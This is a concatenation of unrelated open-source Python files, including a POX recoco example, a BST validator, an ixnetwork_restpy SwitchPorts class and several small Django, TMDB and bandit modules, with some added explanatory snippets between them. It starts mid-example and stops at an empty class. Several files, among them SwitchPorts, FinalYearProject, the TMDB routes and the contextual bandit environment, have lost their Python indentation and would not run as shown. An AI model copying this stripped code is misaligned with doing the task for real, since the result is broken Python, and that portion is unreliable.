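with open(os.path.join(tmpdir, 'bad.json'), 'w') as f:
    f.write('not json')  # triggers (and survives) a ValueError

stats = gather_stats([os.path.join(tmpdir, '*.json')])
print(stats['NumChannels'])  # 42
```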
# File: pox/lib/recoco/examples.py (repo: supriyasingh01/github_basics, license: CC0-1.0)

# Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
These are example uses of the recoco cooperative threading library. Hopefully
they will save time for developers getting used to the POX environment.
I can't seem to find any documentation on recoco on the web. Maybe
Murphy rolled recoco himself?
"""
from pox.core import core
import pox.core  # needed below for pox.core.GoingUpEvent
import pox.openflow.libopenflow_01 as of
from pox.lib.revent import *
from pox.lib.recoco import *
class EventLoopExample (Task):
  """
  Suppose we have a component of our application that uses its own event
  loop. recoco allows us to "add" our select loop to the other event
  loops running within pox.

  First note that we inherit from Task. The Task class is recoco's
  equivalent of python's threading.Thread interface.
  """
  def __init__(self):
    Task.__init__(self)  # call our superconstructor
    self.sockets = self.get_sockets()  # ... the sockets to listen to events on

    # Note! We can't start our event loop until the core is up. Therefore,
    # we'll add an event handler.
    core.addListener(pox.core.GoingUpEvent, self.start_event_loop)

  def start_event_loop(self, event):
    """
    Takes a second parameter: the GoingUpEvent object (which we ignore)
    """
    # This causes us to be added to the scheduler's recurring Task queue
    Task.start(self)

  def get_sockets(self):
    return []

  def handle_read_events(self):
    pass

  def run(self):
    """
    run() is the method that gets called by the scheduler to execute this task
    """
    while core.running:
      # This looks almost exactly like python's select.select, except that
      # it's handled cooperatively by recoco. The only difference in syntax
      # is the "yield" statement, and the capital S on "Select".
      rlist, wlist, elist = yield Select(self.sockets, [], [], 3)
      events = []
      for read_sock in rlist:
        if read_sock in self.sockets:
          events.append(read_sock)

      if events:
        self.handle_read_events()  # ...

"""
And that's it!

TODO: write example usages of the other recoco BlockingTasks, e.g. recoco.Sleep
"""
# File: tests/end_to_end/target_snowflake/tap_s3/__init__.py (repo: thread/pipelinewise, license: Apache-2.0)

import pytest
from tests.end_to_end.helpers.env import E2EEnv
from tests.end_to_end.target_snowflake import TargetSnowflake
@pytest.mark.skipif(not E2EEnv.env['TAP_S3_CSV']['is_configured'], reason='S3 not configured.')
class TapS3(TargetSnowflake):
    """
    Base class for E2E tests for tap S3 -> target snowflake
    """

    # pylint: disable=arguments-differ
    def setUp(self, tap_id: str, target_id: str):
        super().setUp(tap_id=tap_id, target_id=target_id, tap_type='TAP_S3_CSV')
        self.e2e_env.setup_tap_s3_csv()
# File: Chapter4_Trees_And_Graphs/p5_validate_BST.py (repo: howardwkim/CTCI, license: BSD-2-Clause)

from Tree import Tree
from Tree import BinaryNode as Node
# def validate_BST(root):
#     prev = None
#     return validate_BST_helper(root, prev)
#
# def validate_BST_helper(root, prev):
#     if root is not None:
#         if prev is None:
#             prev = root.data
#         return validate_BST_helper(root.left, prev) and \
#             visited(root, prev) and \
#             validate_BST_helper(root.right, prev)
#
# def visited(root, prev):
#     if prev > root.data:
#         return False
#     else:  # prev <= root.data
#         return True


def validate_BST(root):
    # Track the previously visited value in a one-element list so updates
    # made deeper in the recursion are visible to the callers; rebinding a
    # bare local variable would be lost when each recursive call returns.
    prev = [None]
    return validate_BST_helper(root, prev)


def validate_BST_helper(root, prev):
    if root is None:
        return True
    if not validate_BST_helper(root.left, prev):
        return False
    if prev[0] is not None and root.data <= prev[0]:
        return False
    prev[0] = root.data
    return validate_BST_helper(root.right, prev)


def validate_BST2(root):
    return validate_BST2_helper(root, min=None, max=None)


def validate_BST2_helper(root, min, max):
    # Each node must fall strictly between the (min, max) bounds inherited
    # from its ancestors.
    if root is None:
        return True
    if min is not None and root.data <= min:
        return False
    if max is not None and root.data >= max:
        return False
    return (validate_BST2_helper(root.left, min, root.data) and
            validate_BST2_helper(root.right, root.data, max))
n2 = Node(2)
n3 = Node(3)
n4 = Node(4)
n5 = Node(5)
n6 = Node(6)
n7 = Node(7)
n8 = Node(8)
n5.left = n3
n5.right = n7
n3.left = n2
n3.right = n4
n7.left = n6
n7.right = n8
my_tree = Tree(n5)
print validate_BST(my_tree.root)
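A self-contained sanity check of the min/max bounding approach, using a local `Node` class and an `is_bst` helper (both hypothetical, independent of the `Tree` module above) so it runs on its own:

```python
class Node(object):
    def __init__(self, data, left=None, right=None):
        self.data = data
        self.left = left
        self.right = right


def is_bst(root, lo=None, hi=None):
    # Every node must lie strictly inside the (lo, hi) bounds inherited
    # from its ancestors, not just be ordered relative to its parent.
    if root is None:
        return True
    if lo is not None and root.data <= lo:
        return False
    if hi is not None and root.data >= hi:
        return False
    return (is_bst(root.left, lo, root.data) and
            is_bst(root.right, root.data, hi))


valid = Node(5, Node(3, Node(2), Node(4)), Node(7, Node(6), Node(8)))
# Swapping 4 and 6 breaks the BST property even though every parent/child
# pair still looks locally ordered.
invalid = Node(5, Node(3, Node(2), Node(6)), Node(7, Node(4), Node(8)))
print(is_bst(valid))    # True
print(is_bst(invalid))  # False
```

The `invalid` tree is the classic counterexample for checkers that only compare a node with its immediate children.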
# File: HLTriggerOffline/Higgs/python/HiggsValidation_cff.py (repo: ckamtsikis/cmssw, license: Apache-2.0)

import FWCore.ParameterSet.Config as cms
from HLTriggerOffline.Higgs.hltHiggsValidator_cfi import *
HiggsValidationSequence = cms.Sequence(
    hltHiggsValidator
)

#HLTHiggsVal_FastSim = cms.Sequence(
#    recoHiggsValidationHLTFastSim_seq +
#    hltHiggsValidator
#)
# File: tests/library/python/for.py (repo: chrisseaton/katahdin, license: Unlicense)

x = 0
for n in range(10):
    x = x + 1
assert x == 10
# File: ddf_library/functions/graph.py (repo: eubr-bigsea/Compss-Python, license: Apache-2.0)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Lucas Miguel S Ponce"
__email__ = "lucasmsp@gmail.com"
from .graph_lib.page_rank import PageRank
__all__ = ['PageRank']
# File: flaskTest/dbModel.py (repo: LeeKeBo/flaskSystem, license: MIT)

'''
@Description: Database model classes
@Author: lkb
@Date: 2019-08-07 14:07:10
@LastEditTime: 2019-08-14 19:52:07
@LastEditors:
'''
from config import app
from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy(app)


class User(db.Model):
    __tablename__ = 'users'
    id = db.Column(db.Integer, nullable=False,
                   primary_key=True, autoincrement=True)
    # role_id = db.Column(db.Integer, nullable=False, unique=True)
    name = db.Column(db.String(30), nullable=False, unique=True)
    password = db.Column(db.String(50), nullable=False)

    def __repr__(self):
        return '<User %r>' % self.name


# class Role(db.Model):
#     __tablename__ = 'roles'
#     id = db.Column(db.Integer, nullable=False,
#                    primary_key=True, autoincrement=True)
#     name = db.Column(db.String(16), nullable=False,
#                      server_default='', unique=True)
#
#     def __repr__(self):
#         return '<Role %r>' % self.name


# class User(db.Model):
#     __tablename__ = 'users'
#     id = db.Column(db.Integer, nullable=False,
#                    primary_key=True, autoincrement=True)
#     username = db.Column(db.String(32), nullable=False,
#                          unique=True, server_default='', index=True)
#     role_id = db.Column(db.Integer, nullable=False, server_default='0')
#
#     def __repr__(self):
#         return '<User %r,Role id %r>' % (self.username, self.role_id)
# File: ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/switchports_196704c0d1df9b9f03a2d98b3cd0a010.py (repo: rfrye-github/ixnetwork_restpy, license: MIT)

# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class SwitchPorts(Base):
"""This object allows to define the attributes for the physical Switch Ports.
The SwitchPorts class encapsulates a list of switchPorts resources that are managed by the user.
A list of resources can be retrieved from the server using the SwitchPorts.find() method.
The list can be managed by using the SwitchPorts.add() and SwitchPorts.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'switchPorts'
_SDM_ATT_MAP = {
'Enabled': 'enabled',
'EthernetAddress': 'ethernetAddress',
'NumberOfPorts': 'numberOfPorts',
'PortName': 'portName',
'PortNumber': 'portNumber',
}
def __init__(self, parent):
super(SwitchPorts, self).__init__(parent)
@property
def AdvertisedFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.advertisedfeatures_265f4d3fb82c9feee971cbb4d61bcb16.AdvertisedFeatures): An instance of the AdvertisedFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.advertisedfeatures_265f4d3fb82c9feee971cbb4d61bcb16 import AdvertisedFeatures
return AdvertisedFeatures(self)._select()
@property
def Config(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.config_62b7c65bc219bf58bd290f568c5c62cd.Config): An instance of the Config class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.config_62b7c65bc219bf58bd290f568c5c62cd import Config
return Config(self)._select()
@property
def CurrentFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.currentfeatures_f89233df2b9b91ce4ac0f454eece515a.CurrentFeatures): An instance of the CurrentFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.currentfeatures_f89233df2b9b91ce4ac0f454eece515a import CurrentFeatures
return CurrentFeatures(self)._select()
@property
def PeerAdvertisedFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.peeradvertisedfeatures_a19ddfa517ec69fdc6448dae922b1e2c.PeerAdvertisedFeatures): An instance of the PeerAdvertisedFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.peeradvertisedfeatures_a19ddfa517ec69fdc6448dae922b1e2c import PeerAdvertisedFeatures
return PeerAdvertisedFeatures(self)._select()
@property
def State(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.state_323b40267b7188796bf681a8a171debc.State): An instance of the State class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.state_323b40267b7188796bf681a8a171debc import State
return State(self)._select()
@property
def SupportedFeatures(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.supportedfeatures_f9ca2c9da9413f9de97ac5ce0832e78f.SupportedFeatures): An instance of the SupportedFeatures class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.supportedfeatures_f9ca2c9da9413f9de97ac5ce0832e78f import SupportedFeatures
return SupportedFeatures(self)._select()
@property
def SwitchPortQueues(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.switchportqueues_85c93c375f96f8d70346886eaacbe1fa.SwitchPortQueues): An instance of the SwitchPortQueues class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.switchportqueues_85c93c375f96f8d70346886eaacbe1fa import SwitchPortQueues
return SwitchPortQueues(self)
@property
def Enabled(self):
"""
Returns
-------
- bool: If true, the ports in the selected port range are added to the switch.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def EthernetAddress(self):
"""
Returns
-------
- str: Indicates the hardware address of the ports in the port range.
"""
return self._get_attribute(self._SDM_ATT_MAP['EthernetAddress'])
@EthernetAddress.setter
def EthernetAddress(self, value):
self._set_attribute(self._SDM_ATT_MAP['EthernetAddress'], value)
@property
def NumberOfPorts(self):
"""
Returns
-------
- number: Specifies the number of ports in a port range.
"""
return self._get_attribute(self._SDM_ATT_MAP['NumberOfPorts'])
@NumberOfPorts.setter
def NumberOfPorts(self, value):
self._set_attribute(self._SDM_ATT_MAP['NumberOfPorts'], value)
@property
def PortName(self):
"""
Returns
-------
- str: Indicates the name for the switch port interface.
"""
return self._get_attribute(self._SDM_ATT_MAP['PortName'])
@PortName.setter
def PortName(self, value):
self._set_attribute(self._SDM_ATT_MAP['PortName'], value)
@property
def PortNumber(self):
"""
Returns
-------
- str: Indicates a value that the datapath associates with a physical port.
"""
return self._get_attribute(self._SDM_ATT_MAP['PortNumber'])
@PortNumber.setter
def PortNumber(self, value):
self._set_attribute(self._SDM_ATT_MAP['PortNumber'], value)
def update(self, Enabled=None, EthernetAddress=None, NumberOfPorts=None, PortName=None, PortNumber=None):
"""Updates switchPorts resource on the server.
Args
----
- Enabled (bool): If true, the ports in the selected port range are added to the switch.
- EthernetAddress (str): Indicates the hardware address of the ports in the port range.
- NumberOfPorts (number): Specifies the number of ports in a port range.
- PortName (str): Indicates the name for the switch port interface.
- PortNumber (str): Indicates a value that the datapath associates with a physical port.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Enabled=None, EthernetAddress=None, NumberOfPorts=None, PortName=None, PortNumber=None):
"""Adds a new switchPorts resource on the server and adds it to the container.
Args
----
- Enabled (bool): If true, the ports in the selected port range are added to the switch.
- EthernetAddress (str): Indicates the hardware address of the ports in the port range.
- NumberOfPorts (number): Specifies the number of ports in a port range.
- PortName (str): Indicates the name for the switch port interface.
- PortNumber (str): Indicates a value that the datapath associates with a physical port.
Returns
-------
- self: This instance with all currently retrieved switchPorts resources using find and the newly added switchPorts resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained switchPorts resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, Enabled=None, EthernetAddress=None, NumberOfPorts=None, PortName=None, PortNumber=None):
"""Finds and retrieves switchPorts resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve switchPorts resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all switchPorts resources from the server.
Args
----
- Enabled (bool): If true, the ports in the selected port range are added to the switch.
- EthernetAddress (str): Indicates the hardware address of the ports in the port range.
- NumberOfPorts (number): Specifies the number of ports in a port range.
- PortName (str): Indicates the name for the switch port interface.
- PortNumber (str): Indicates a value that the datapath associates with a physical port.
Returns
-------
- self: This instance with matching switchPorts resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of switchPorts data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the switchPorts resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def SimulatePortUpDown(self):
"""Executes the simulatePortUpDown operation on the server.
Exec to simulate port up and down.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('simulatePortUpDown', payload=payload, response_object=None)
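The find docstring above notes that named parameters are evaluated server-side as regular expressions, and that an exact match requires the value to start with ^ and end with $. That anchoring behavior can be sketched locally with Python's re module (the port names below are invented for illustration, not taken from any server):

```python
import re

# Hypothetical port names; find() matches each named parameter against
# values like these using regular expressions.
names = ['eth1', 'eth10', 'myeth1']

# Unanchored pattern: matches anywhere in the value, so all three hit.
print([n for n in names if re.search('eth1', n)])    # ['eth1', 'eth10', 'myeth1']

# Anchored with ^ and $: exact match only, as the docstring recommends.
print([n for n in names if re.search('^eth1$', n)])  # ['eth1']
```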
# ===== week1/skimage_save_image.py | Mohamed-Magid/image-processing | MIT =====
# import io from scikit-image library
from skimage import io
img = io.imread(fname='imagename.jpg')
# do some process here :)
# save the image
io.imsave(fname='C:\\Users\\username\\Pictures\\newimagename.jpg', arr=img)
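The "do some process here" placeholder above can be any array operation, since scikit-image represents images as NumPy arrays. A minimal sketch of one such step (horizontal flip plus 8-bit intensity inversion) on a synthetic array standing in for the loaded image; the shape and dtype are assumptions, not taken from the original file:

```python
import numpy as np

# Synthetic 4x4 grayscale "image" standing in for the array io.imread returns.
img = np.arange(16, dtype=np.uint8).reshape(4, 4)

# Horizontal flip: reverse the column axis.
flipped = img[:, ::-1]

# Intensity inversion for 8-bit data: 255 minus each pixel value.
inverted = 255 - flipped

print(inverted.shape)       # (4, 4)
print(int(inverted[0, 0]))  # 252
```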
# ===== raven/response/_profile/_finalYearProject/finalYearProject.py | jawahar273/Tx | MIT =====
from raven.response.abstract_response import BaseResponse
class FinalYearProject(BaseResponse):
def __init__(self, scope=None):
        super(FinalYearProject, self).__init__(scope=scope)
def get_class_name(self):
return self.__class__.__name__
def render(self, pretty=None):
self.class_name = self.get_class_name() # class name
super().render(class_name=self.class_name, sub_path="_profile")
return self.render_template.render(pretty=pretty)
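get_class_name above relies on `self.__class__.__name__`, which resolves to the concrete subclass at runtime. A standalone sketch of that behavior (the stub classes here only mirror the names, not the real raven package):

```python
class BaseResponse:
    def get_class_name(self):
        # __class__ resolves to the runtime type, so subclasses report
        # their own name without overriding this method.
        return self.__class__.__name__

class FinalYearProject(BaseResponse):
    pass

print(BaseResponse().get_class_name())      # BaseResponse
print(FinalYearProject().get_class_name())  # FinalYearProject
```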
# ===== tmdb/route/collection.py | leandcesar/tmdb-python | MIT =====
# -*- coding: utf-8 -*-
from .base import Base, Response
class Collection(Base):
async def details(self, collection_id: int) -> Response:
"""Get collection details by id.
See more: https://developers.themoviedb.org/3/collections/get-collection-details
"""
return await self.request(f"collection/{collection_id}")
async def images(self, collection_id: int) -> Response:
"""Get the images for a collection by id.
See more: https://developers.themoviedb.org/3/collections/get-collection-images
"""
return await self.request(f"collection/{collection_id}/images")
async def translations(self, collection_id: int) -> Response:
"""Get the list translations for a collection by id.
See more: https://developers.themoviedb.org/3/collections/get-collection-translations
"""
return await self.request(f"collection/{collection_id}/translations")
async def search(self, query: str, *, page: int = 1) -> Response:
"""Search for collections.
See more: https://developers.themoviedb.org/3/search/search-collections
"""
return await self.request("search/collection", query=query, page=page)
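Each endpoint above builds a URL path with an f-string and awaits a shared request helper. A self-contained sketch of that pattern with a stubbed request coroutine (the StubClient class and its echo payload are stand-ins, not the real tmdb-python client):

```python
import asyncio

class StubClient:
    async def request(self, path, **params):
        # Stand-in for the real HTTP call: echo what would be requested.
        return {"path": path, "params": params}

    async def details(self, collection_id: int):
        return await self.request(f"collection/{collection_id}")

    async def search(self, query: str, *, page: int = 1):
        return await self.request("search/collection", query=query, page=page)

result = asyncio.run(StubClient().details(10))
print(result)  # {'path': 'collection/10', 'params': {}}
```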
# ===== plan2explore/tools/count_dataset.py | sarthak268/plan2explore | Apache-2.0 =====
# Copyright 2019 The Dreamer Authors. Copyright 2020 Plan2Explore Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
def count_dataset(directory):
directory = os.path.expanduser(directory)
if not tf.gfile.Exists(directory):
message = "Data set directory '{}' does not exist."
raise ValueError(message.format(directory))
pattern = os.path.join(directory, '*.npz')
def func():
filenames = tf.gfile.Glob(pattern)
episodes = len(filenames)
episodes = np.array(episodes, dtype=np.int32)
return episodes
return tf.py_func(func, [], tf.int32)
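count_dataset above wraps a plain Python file count in tf.py_func so it can run as a graph op. The counting itself needs only the standard library; a hedged sketch of what the op computes (the count_npz name is mine, not from the repo):

```python
import glob
import os
import tempfile

def count_npz(directory):
    """Count *.npz episode files in a directory, as func() does above."""
    directory = os.path.expanduser(directory)
    if not os.path.isdir(directory):
        raise ValueError("Data set directory '{}' does not exist.".format(directory))
    return len(glob.glob(os.path.join(directory, '*.npz')))

# Demo on a throwaway directory: two .npz files plus one unrelated file.
with tempfile.TemporaryDirectory() as d:
    for name in ('a.npz', 'b.npz', 'notes.txt'):
        open(os.path.join(d, name), 'w').close()
    print(count_npz(d))  # 2
```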
# ===== envs/contextual.py | leilayasmeen/Bandits | MIT =====
import numpy as np
import numpy.random as npr
from .base import Environment, Feedback, Spec
class ContextualEnv(Environment):
def __init__(self, arms, sd):
super().__init__()
self.arms = arms
self.sd = sd
self.max_rew = None
self.mean_rews = None
@property
def k(self):
return self.arms.shape[0]
@property
def d(self):
return self.arms.shape[1]
@property
def regrets(self):
return self.max_rew - self.mean_rews
def create_spec(self):
        ctx = npr.randn(self.d)  # draw one d-dimensional context vector (d = arm dimension)
#self.mean_rews = self.arms.dot(ctx)
self.mean_rews = np.linalg.norm(np.multiply(self.arms, ctx[np.newaxis, :]), ord=1, axis=1)
self.max_rew = np.max(self.mean_rews)
return ContextualSpec(self.t, ctx)
def get_feedback(self, arm, spec=None):
if spec is None:
spec = self.spec
mean_rews = self.mean_rews
max_rew = self.max_rew
else:
mean_rews = self.arms.dot(spec.ctx)
max_rew = np.max(mean_rews)
mean = mean_rews[arm]
noise = npr.randn() * self.sd
rew = mean + noise
return ContextualFeedback(spec, arm, rew, noise, max_rew)
class ContextualSpec(Spec):
def __init__(self, t, ctx):
super().__init__(t)
self.ctx = ctx
class ContextualFeedback(Feedback):
def __init__(self, spec, arm, rew, noise, max_rew):
super().__init__(spec, arm, rew)
self.noise = noise
self.max_rew = max_rew
@property
def t(self):
return self.spec.t
@property
def ctx(self):
return self.spec.ctx
@property
def mean_rew(self):
return self.rew - self.noise
@property
def regret(self):
return self.max_rew - self.mean_rew
def __repr__(self):
return f'CtxFb(arm={self.arm}, reg={self.regret}, noise={self.noise}, mean={self.mean_rew})'
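In create_spec above, each arm's mean reward is the L1 norm of the arm weighted elementwise by the context, and per-arm regret is the gap to the best mean. A small numpy sketch of that computation with made-up arms and context (the values are illustrative only):

```python
import numpy as np

arms = np.array([[1.0, 0.0],
                 [0.0, 2.0],
                 [1.0, 1.0]])   # K=3 arms, d=2 (invented values)
ctx = np.array([0.5, -1.0])     # one fixed context vector

# Mean reward per arm: L1 norm of the elementwise product, as in create_spec.
mean_rews = np.linalg.norm(arms * ctx[np.newaxis, :], ord=1, axis=1)
print(mean_rews)  # [0.5 2.  1.5]

# Per-arm regret: gap to the best achievable mean reward.
regrets = mean_rews.max() - mean_rews
print(regrets)    # [1.5 0.  0.5]
```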
# ===== google-cloud-sdk/lib/surface/service_management/versions/__init__.py | bopopescu/searchparty | Apache-2.0 =====
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Package for the service-management/versions CLI subcommands."""
from googlecloudsdk.calliope import base
# NOTE: These are deprecated, so not included in the GA release track
# Users should use the functionally identical configs subcommand group.
@base.ReleaseTracks(base.ReleaseTrack.BETA)
@base.Hidden
class Versions(base.Group):
"""Manage versions for various services.
DEPRECATED: This command group is deprecated and will be removed.
Use 'gcloud beta service-management configs' instead.
"""
# ===== django/contrib/gis/db/backends/mysql/base.py | webjunkie/django | BSD-3-Clause =====
from django.db.backends.mysql.base import *
from django.db.backends.mysql.base import DatabaseWrapper as MySQLDatabaseWrapper
from django.contrib.gis.db.backends.mysql.creation import MySQLCreation
from django.contrib.gis.db.backends.mysql.introspection import MySQLIntrospection
from django.contrib.gis.db.backends.mysql.operations import MySQLOperations
class DatabaseWrapper(MySQLDatabaseWrapper):
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.creation = MySQLCreation(self)
self.ops = MySQLOperations(self)
self.introspection = MySQLIntrospection(self)
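The wrapper above customizes a backend purely by subclassing and swapping collaborator objects in __init__. A library-free sketch of the same pattern (the class names here are generic placeholders, not Django API):

```python
class Creation:
    def describe(self):
        return "base creation"

class GISCreation(Creation):
    def describe(self):
        return "gis creation"

class DatabaseWrapper:
    def __init__(self):
        self.creation = Creation()

class GISDatabaseWrapper(DatabaseWrapper):
    def __init__(self):
        # Reuse the parent's setup, then swap in the specialized helper.
        super().__init__()
        self.creation = GISCreation()

print(DatabaseWrapper().creation.describe())     # base creation
print(GISDatabaseWrapper().creation.describe())  # gis creation
```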
# ===== fileupload/models.py | aih/pdf2html | MIT =====
from django.db import models
class Pdf(models.Model):
# This is a small demo using FileField
file = models.FileField(upload_to="pdf")
slug = models.SlugField(max_length=50, blank=True)
    def __unicode__(self):
        return self.file.name
@models.permalink
def get_absolute_url(self):
return ('upload-new', )
def save(self, *args, **kwargs):
self.slug = self.file.name
super(Pdf, self).save(*args, **kwargs)
class Html(models.Model):
filename = models.SlugField(max_length=50, blank=True)
fileid = models.CharField(max_length=71, blank=False)
html = models.TextField()
def __unicode__(self):
return self.filename
@models.permalink
def get_absolute_url(self):
return ('viewhtml', [self.fileid] )
def save(self, *args, **kwargs):
super(Html, self).save(*args, **kwargs)
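Pdf.save above derives the slug from the uploaded file's name before delegating to the parent save. The hook pattern can be sketched without Django (the Record class and its return values are invented for illustration):

```python
class Record:
    def save(self):
        # Stand-in for the ORM write: report what would be persisted.
        return ('saved', self.__dict__.copy())

class Pdf(Record):
    def __init__(self, filename):
        self.filename = filename
        self.slug = ''

    def save(self):
        # Derive the slug just before persisting, then delegate upward.
        self.slug = self.filename
        return super().save()

status, fields = Pdf('report.pdf').save()
print(status, fields['slug'])  # saved report.pdf
```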
# ===== todolist/todolist/wsgi.py | zhangshuoqi/todolist | MIT =====
"""
WSGI config for todolist project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
sys.path.append('/django/todolist')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "todolist.settings")
application = get_wsgi_application()
"""
path = '/Django/todolist'
if path not in sys.path:
sys.path.insert(0, '/Django/todolist')
os.environ['DJANGO_SETTINGS_MODULE'] = 'todolist_app.settings'
#import django.core.handlers.wsgi #old version use
#application = django.core.handlers.wsgi.WSGIHandler()
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
"""
"""
from os.path import join,dirname,abspath
PROJECT_DIR = dirname(dirname(abspath(__file__)))
sys.path.insert(0,PROJECT_DIR)
os.environ["DJANGO_SETTINGS_MODULE"] = "todolist_app.settings"
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
"""
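The `application` object above is the WSGI callable a server imports. The callable contract itself (environ in, start_response called, iterable of bytes out) can be sketched with only the standard library; this toy app is illustrative and unrelated to the Django project:

```python
from wsgiref.util import setup_testing_defaults

def application(environ, start_response):
    # A WSGI app receives the request environ and a start_response callable,
    # and returns an iterable of byte strings as the response body.
    body = b"hello from wsgi"
    start_response('200 OK', [('Content-Type', 'text/plain'),
                              ('Content-Length', str(len(body)))])
    return [body]

# Exercise the callable directly, as a server would.
environ = {}
setup_testing_defaults(environ)
collected = {}
def start_response(status, headers):
    collected['status'] = status

print(b''.join(application(environ, start_response)))  # b'hello from wsgi'
print(collected['status'])                             # 200 OK
```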
# ===== Py Learning/10. String/strings.py | MahmudX/TestSharp | MIT =====
x = 'heLLo world'
print("Swap the case: " + x.swapcase())
print("Set all case to upper: " + x.upper())
print("Set all case to lower: " + x.lower())
print("Set all case to lower aggressively: " + x.casefold())
print("Set every word\'s first letter to upper: " + x.title())
print("Set the first word\'s first letter to upper in a sentence: " + x.capitalize())
x = x.split()
y = '--'.join(x)
print(y)
# ===== app/models/model.py | yashodharNellorepalli/casaone | MIT =====
from app import db
class Rating(db.Model):
